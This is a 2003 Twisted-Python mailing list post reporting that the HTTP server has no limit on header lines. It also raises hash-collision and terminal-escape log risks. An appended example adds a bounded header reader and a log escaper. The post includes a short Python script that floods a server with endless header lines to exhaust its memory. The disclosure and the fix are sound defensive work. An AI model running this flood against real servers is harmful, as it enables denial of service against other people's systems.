[Twisted-Python] possible web server attacks

Andrew Dalke dalke at dalkescientific.com
Sun Jun 8 20:19:33 EDT 2003


There appears to be a trivial attack against the HTTP server.

The code doesn't restrict the number of header lines sent to the
server, so the following will do nasty things to it.

 >>> import socket
 >>> def go():
 ...     # Open one connection and send a request line that is never completed
 ...     f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 ...     f.connect(("localhost", 8080))
 ...     f.sendall(b"GET / HTTP/1.0\r\n")
 ...     # Stream distinct header lines, never the blank line that ends the
 ...     # header block, so the server keeps buffering them
 ...     for i in range(1000000):
 ...         f.sendall(b"%d: X\r\n" % i)
 ...         if i % 1000 == 0: print(i)
 ...
 >>> go()
  ....
 >>> go()
  ....

Keep going until the machine runs out of memory.  I didn't have
a machine I wanted to sacrifice for that, so I don't know if the
actual code will catch the MemoryError or not.  Even if not, an
attacker can bring the memory use right up to the limit, thus
preventing other actions from occurring.

There needs to be a limit to the total number of header lines read
(or, as with Apache, a limit to the total number of bytes read for
the header).

As was pointed out before when I brought this up, there is a limit
to the line size.  But that's not enough.

Also, this non-limit opens Twisted up to the hash collision attack
mentioned recently on python-dev.

BTW, I also note that Twisted passes non-ASCII characters to the log.
This can be used as an attack against some terminals.  Here's one
document describing the method

   http://www.digitaldefense.net/labs/papers/Termulation.txt

Twisted should do what Apache does and escape those characters.

					Andrew
					dalke at dalkescientific.com
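The following is an added example, not code from the post above or from Twisted itself, showing the two fixes the post asks for: a header reader that enforces a budget on the number of header lines, the total header bytes and the length of a single line (as Apache does for the header block), and a log-field escaper in the style of Apache's that keeps ESC and 8-bit control bytes out of the log. The class and function names, the limit values and the replayed attack are all assumptions chosen for the illustration, not Twisted's or Apache's defaults.

```python
# Added example (not Twisted's own code): a header reader that enforces the budgets
# the post asks for, plus a log-field escaper in the style of Apache's.  All limit
# values and names here are assumptions chosen for the illustration.
from typing import Dict, List


class HeaderLimitExceeded(Exception):
    """A client exceeded a header budget; the server should drop the connection."""


class BoundedHeaderReader:
    """Incrementally parse an HTTP/1.x header block under hard limits.

    Three budgets are enforced on the raw bytes as they arrive: total header
    bytes, number of header lines, and length of any single line.  A client that
    trickles in one line at a time, as in the post, therefore cannot grow server
    memory past max_bytes no matter how long it keeps the connection open.
    """

    def __init__(self, max_lines: int = 100, max_bytes: int = 8192, max_line: int = 4096):
        self.max_lines = max_lines
        self.max_bytes = max_bytes
        self.max_line = max_line
        self._buf = b""
        self._total = 0
        self.lines: List[bytes] = []
        self.done = False

    def feed(self, chunk: bytes) -> bool:
        """Consume bytes; return True once the blank line ending the headers arrives."""
        if self.done:
            raise ValueError("header block already complete")
        # Count every byte before buffering it, so the total is bounded even
        # for a line that never terminates.
        self._total += len(chunk)
        if self._total > self.max_bytes:
            raise HeaderLimitExceeded("header block exceeds %d bytes" % self.max_bytes)
        self._buf += chunk
        while b"\r\n" in self._buf:
            line, self._buf = self._buf.split(b"\r\n", 1)
            if line == b"":
                self.done = True
                return True
            if len(line) > self.max_line:
                raise HeaderLimitExceeded("header line exceeds %d bytes" % self.max_line)
            self.lines.append(line)
            if len(self.lines) > self.max_lines:
                raise HeaderLimitExceeded("more than %d header lines" % self.max_lines)
        return False

    def headers(self) -> Dict[bytes, List[bytes]]:
        """Return the parsed headers (lower-cased names, repeated names kept in order)."""
        parsed: Dict[bytes, List[bytes]] = {}
        for line in self.lines:
            name, sep, value = line.partition(b":")
            if not sep:
                raise ValueError("malformed header line: %r" % line)
            parsed.setdefault(name.strip().lower(), []).append(value.strip())
        return parsed


def replay_attack(n_lines: int, **limits) -> int:
    """Replay the post's attack (numbered header lines, never a blank line) against a
    reader with the given limits.  Returns how many lines were accepted before the
    reader refused, or n_lines if it never did."""
    reader = BoundedHeaderReader(**limits)
    for i in range(n_lines):
        try:
            reader.feed(b"%d: X\r\n" % i)
        except HeaderLimitExceeded:
            return i
    return n_lines


# Bytes that get a short C-style escape in the log; every other byte outside
# printable ASCII becomes \xNN.
_SHORT_ESCAPES = {0x08: "\\b", 0x09: "\\t", 0x0A: "\\n", 0x0B: "\\v", 0x0D: "\\r",
                  0x22: '\\"', 0x5C: "\\\\"}


def escape_log_item(item: bytes) -> str:
    """Escape a log field, in the style of Apache's log writer, so that ESC, 8-bit
    control bytes and other non-printables never reach a terminal tailing the log."""
    out = []
    for b in item:
        if b in _SHORT_ESCAPES:
            out.append(_SHORT_ESCAPES[b])
        elif 0x20 <= b <= 0x7E:
            out.append(chr(b))
        else:
            out.append("\\x%02x" % b)
    return "".join(out)


if __name__ == "__main__":
    print("lines accepted with max_lines=100:", replay_attack(10**6, max_lines=100))
    print("lines accepted with max_bytes=8192:",
          replay_attack(10**6, max_lines=10**6, max_bytes=8192))
    print(escape_log_item(b"GET /\x1b[2J\x9b HTTP/1.0"))
```

The byte budget is checked before the chunk is appended to the buffer, which matters for the variant of the attack that sends one enormous line with no terminator: a per-line limit alone only fires once the line ends. Either limit fires long before the million lines in the post are consumed, so the connection is closed with a bounded amount of memory spent on it.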